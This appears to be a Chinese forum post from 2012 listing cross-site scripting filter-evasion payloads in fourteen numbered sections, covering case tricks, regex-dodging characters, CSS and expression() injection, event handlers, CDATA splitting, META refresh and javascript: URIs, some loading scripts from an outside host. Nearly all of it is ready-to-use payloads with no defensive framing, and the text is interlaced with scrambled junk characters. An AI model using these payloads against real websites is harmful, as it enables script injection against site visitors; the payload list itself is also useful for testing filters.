1. 改变字符大小写
_5 k6 [- _8 H9 c$ l4 ?) w% l6 P/ P' o4 e8 C: G, c
( g9 [( R5 ~4 X8 {* i/ s( t9 p
4 F8 u4 q0 k5 A+ U1 s <sCript>alert(‘d’)</scRipT>% U G# J+ R. f' V
1 p, J2 S, N' G' S, e& C
2. 利用多加一些其它字符来规避Regular Expression的检查3 e2 @% ~5 r3 t- u2 d
) ?. X3 g/ R) R. K: U9 k <<script>alert(‘c’)//<</script>
4 D) u0 `8 t5 Q/ n9 s; P! Q2 F! e8 b# ^! D+ M# j8 O6 c4 v& L
<SCRIPT a=">" SRC="t.js"></SCRIPT>
" K, E$ b x! {0 S# u4 t4 t" F8 U3 N
<SCRIPT =">" SRC="t.js"></SCRIPT>
2 |+ p7 s- b j$ C5 ^* G
# [( F" E# l5 h: m4 P <SCRIPT a=">" ” SRC="t.js"></SCRIPT>, c8 D: o# c3 e4 w$ }6 m/ {) |# u
+ h( Q' L7 U _* c+ P5 u) n
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>9 M8 u T4 w& n) z' T$ I
# E& f9 z" z$ q2 ] <SCRIPT a=`>` SRC="t.js"></SCRIPT>
, |. T( K( x8 {- q- M! r
+ s8 X% S s: B" g" W <SCRIPT a=">’>" SRC="t.js"></SCRIPT>, L* P# a/ V7 g: b7 I1 L
' F' f0 ]4 h8 \4 H4 `! B3. 以其它扩展名取代.js
; O$ A* `$ y" F. d5 {: {7 W- S$ o3 S) l8 H
<script src="bad.jpg"></script>
5 c2 t* E- Z9 I4 w
* @' g- T' ]- j3 A$ F, `; R% h$ _$ m4. 将Javascript写在CSS档里: B. f% N' B! j, ]
% A; K3 H A s1 I <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
0 [+ }* t( ]1 V! Y" j5 _! I& \& p
example:8 i. \9 @- }1 W+ e8 |
3 h5 K( J& r4 b b! Z9 v body {
& n# H: B1 O* n V" x3 w/ ]0 x% S# ^8 I- C8 E# {5 s0 V% q" V
background-image: url(‘javascript:alert("XSS");’)
t* N$ H- h7 B; U$ G% ~. D+ X. }- J
}
, G$ [) X/ O. o% J; a& Z5 g& \$ ?- ? Y7 ]9 j4 ]
5. 在script的tag里加入一些其它字符
( g% e- m/ J! y; k5 Z2 Q! Y6 C3 [4 J9 t* t
<SCRIPT/SRC="t.js"></SCRIPT>
1 H2 h5 G: ^8 Y$ L" d8 j
4 C: ]+ k) o/ N$ D) r+ u# M <SCRIPT/anyword SRC="t.js"></SCRIPT>
' u# |' P. J) F2 c& |8 B4 U' R! x0 {; Y' ~
6. 使用tab或是new line来规避
+ S) S& L; u) E. f/ c
7 X2 G' f0 \0 k2 g0 f <img src="jav ascr ipt:alert(‘XSS3′)"># z- \4 I* L4 v4 f8 P
% {' O; d# j' l6 r* f8 C <img src="jav ascr ipt:alert(‘XSS3′)">
1 R& K' [' N- G2 K. P8 Z1 d. ?/ r+ @/ c$ Q; \+ v$ S
<IMG SRC="jav ascript:alert(‘XSS’);">
" d+ d$ m0 M9 @- t* E! v! h* R. M3 _$ B: F( L
-> tag0 Q3 g* f5 _3 y; H( h
* Y: M1 Z$ ]/ [4 ] -> new line. J3 W; @/ Z5 R/ R' G6 [5 W- H! A
* T" q5 _! h1 l+ P1 i
7. 使用"\"来规避; p5 T. E2 u0 u4 N7 \) F1 z- c q
: n2 W# e3 L2 N0 J
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
8 ]; P9 c; {! ]7 v
% s3 y2 r0 @# Y7 h2 ~# v <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
6 y% L$ H1 u- } D$ U
~% @) T7 r) b; E7 B- x <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))"> J& \$ B5 I( S/ E& [# j3 f n, D6 j
$ B" ~9 r4 C3 |+ t
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
5 ~* B3 M& `# ~6 S1 Z' n, q) L0 m$ u$ V, y. T3 ^, e# Q$ Z. q
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>) v4 ^: I$ ]! ]* j# r3 r
7 p2 v0 R! W0 x0 @; j4 B
8. 使用Hex encode来规避(也可能会把";"拿掉)( f7 i! u$ J$ p! q. L
/ B$ f: I0 @) h+ {
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
, r5 h% }8 N# }1 _4 J/ t9 v
' u- e6 |& h6 `6 G; z 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
2 p! Z1 T* _+ Y1 c
3 _) H) J1 ]3 C7 c: ]4 H% P# l <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
, Y" n$ W$ W2 Z. F2 }$ j4 I
! b0 f' c. R$ @* a 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">9 l6 \6 X C `: y. c
$ c# H5 `( F' L; r% [, i$ m0 \, _! u9. script in HTML tag. K% W# I( t# A# v
+ |% r% K9 ]+ s7 y3 k! t+ @ <body onload=」alert(‘onload’)」>2 K: k6 U" }/ z
5 L/ z- M" U0 f6 O9 ^, R onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
! N, r" \! Y% P9 P3 E& p
( b5 Q+ ^- ?/ G( w10. 在swf里含有xss的code j: r; q7 O7 U& r( @0 f, {% J% g; L
) V$ K' u: c4 U" u8 n. s& ^ <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>3 S9 l7 h& ^ J6 U3 G4 E
$ `! J- |+ O2 Q+ U$ d3 ], T
11. 利用CDATA将xss的code拆开,再组合起来。
& I" p6 q* l* R. S0 ?' T$ ^9 o% C) } m0 \/ y% m) u' X
<XML ID=I><X><C>9 ^% O3 T, M# g7 k) j4 H, Q, F
9 d; H+ n# F# C
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
/ j8 h/ [' I- ~) g% E
, L. t* m, `- |+ a </C></X>
$ M+ {* ~6 g1 w* j, B# D d0 g9 V9 d
</xml>
( J; M7 u& r. O- _; g& J& b
: h! K: A r T/ x) K2 N" t <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
; d% w) x; _: C4 O! z' \8 z. S J# o5 c
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>7 W, N* a! F4 D: u) }3 x, ?* m
; y! o- C8 n9 p# S% ]
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>4 N' o2 ^* {" @$ t' G1 P" l. f
, T: Z0 I; o% F9 x4 U12. 利用HTML+TIME。6 {+ h( |- {8 c P1 i
+ P. @" e" u0 s/ k3 _5 `2 k
<HTML><BODY>" `6 B5 L- `. X V. ^+ ]
7 W, d8 Q" A Y w1 g <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">: a: e5 q- U- V/ l# s6 C* {
7 A$ K: G" ~1 r3 S <?import namespace="t" implementation="#default#time2"> Z7 w3 y: ~% \/ O0 G. J
# W0 E5 [8 v( T% Q: s( u. S3 a <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">) L# B6 n0 p7 I( c& v3 R
) |; `6 S# C$ c' u) c. _& }
</BODY></HTML>
+ y) b8 D& Y. g; @% T2 B8 S7 \: ~% q+ h# m/ p- R
13. 透过META写入Cookie。
: ?1 R2 y, B: \2 }7 }# o! b. E! l8 |. n
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">+ d% k; I0 X. w4 T" E1 u
' Y1 n, f* y& a- [$ o14. javascript in src , href , url
; {0 C: s" q+ V. a7 m& _; Z6 U$ ?! C* _* B$ z# V. Z
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
9 v0 ^% G% |/ y& ^ |7 K& @
! u4 N7 D; F* |2 C( s <img src="javascript:alert(‘XSS3′)">
2 v; @: N4 }' Y+ C: R% S! U) X1 Y5 f0 O+ M6 J9 T
<IMG DYNSRC="javascript:alert(‘XSS20′)">. G4 X% T6 D3 }' d T
8 B$ b# Z- f' R3 E: `" t
<IMG LOWSRC="javascript:alert(‘XSS21′)">
6 s8 O, R) u/ H4 J; T: e. ]4 i8 B, I, Z2 C9 |" ]* |9 k4 o
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">3 O+ s9 J1 t( X- w4 H- `
& [/ b% I1 U0 P. n. a6 c: X
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
6 \% C6 e$ h+ B, ~1 C, m3 r- S9 h2 t
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
, Z1 [7 i3 e: f. {" T' i5 t% e7 I5 C; _4 J% C
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">. |: M" @: S2 f
. ?. z# q: p2 c, q }* h
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
4 R# m2 P9 z7 A O _5 A% {4 T5 W, @# ^
</STYLE><A CLASS=XSS></A>5 h" ` W& e x8 G K# b5 J# Y. ^! a
% b" e# X4 {. H7 e
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>; L9 |2 G! L5 h$ T! M1 G6 K
0 o" ^. D, d/ Z% l! C
|
发表于 2012-12-31 09:59:28
收藏
支持
反对